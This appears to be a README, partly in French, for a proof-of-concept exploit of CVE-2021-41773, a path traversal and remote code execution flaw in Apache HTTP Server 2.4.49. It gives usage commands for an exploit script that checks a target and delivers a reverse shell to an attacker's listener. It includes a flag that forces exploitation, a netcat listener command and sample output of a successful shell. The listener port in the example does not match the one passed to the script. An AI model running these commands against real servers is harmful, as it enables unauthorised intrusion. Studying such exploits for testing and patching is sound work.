
Exploit de preuve de concept pour CVE-2021-41773, une vulnérabilité de traversée de chemin et d'exécution de code à distance dans Apache HTTP Server 2.4.49. Automatise la vérification de la vulnérabilité et la livraison de la charge utile du reverse shell.
Ceci est un exploit de preuve de concept pour CVE-2021-41773, une vulnérabilité de traversée de chemin et d'exécution de code à distance dans Apache HTTP Server 2.4.49.
git clone https://github.com/adrianmafandy/CVE-2021-41773
cd CVE-2021-41773
pip install requests
# Basic syntax
python3 exploit.py -t <TARGET-URL> -lh <LHOST> -lp <LPORT>
# Force exploitation even if vulnerability check fails
python3 exploit.py -t <TARGET-URL> -lh <LHOST> -lp <LPORT> -f
# Basic syntax
python3 exploit.py -t 192.168.1.100 -lh 10.0.0.5 -lp 1337
# Force exploitation even if vulnerability check fails
python3 exploit.py -t 192.168.1.100 -lh 10.0.0.5 -lp 1337 -f
Avant d'exécuter l'exploit, configurez un écouteur netcat :
nc -lvnp 4444
$ python3 exploit.py -t 192.168.1.100 -lh 10.0.0.5 -lp 1337
______
(_____ \
_____) ) _ _ ____ ____ ___ ____
| ____/ | | | _ \ / ___) _ \ / _ |
| | | | | | | | | | | |_| ( (_| |
|_| \___/|_| |_|_| \___/ \___ |
(_____|
Apache2 2.4.49 - CVE-2021-41773
[*] Checking if target is vulnerable...
[+] Target is VULNERABLE!
[*] Executing reverse shell payload...
[+] Reverse shell payload executed successfully!
[*] Check your listener